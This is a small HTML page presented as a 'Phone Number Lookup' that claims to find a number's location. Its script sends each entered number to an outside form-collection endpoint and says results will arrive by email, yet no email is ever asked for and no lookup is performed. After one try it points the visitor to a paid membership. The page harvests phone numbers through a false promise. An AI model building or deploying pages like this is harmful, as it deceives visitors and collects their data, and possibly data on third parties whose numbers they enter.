
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>Phone Lookup</title>
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <link rel="stylesheet" href="style.css" />
</head>
<body>
  <div class="box">
    <h2>📍 Phone Number Lookup</h2>
    <input type="text" id="phone" placeholder="Enter phone number" />
    <button onclick="submitLookup()">Get Location</button>
    <div id="status"></div>
  </div>

  <script>
    let lookupCount = 0;

    function submitLookup() {
      const phone = document.getElementById('phone').value.trim();
      const status = document.getElementById('status');

      if (!phone) {
        status.textContent = "❗ Please enter a phone number.";
        return;
      }

      if (lookupCount === 0) {
        status.textContent = "✅ Free lookup sent! You will receive details via email shortly.";

        fetch("https://formspree.io/f/xayvzdry", {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ phone_number: phone, lookup_type: "Free Lookup" })
        }).catch(() => {
          status.textContent = "⚠️ Failed to send request. Try again later.";
        });
      } else {
        status.textContent = "❌ Free lookup used. Additional lookups require membership.";
      }

      lookupCount++;
    }
  </script>
</body>
</html>
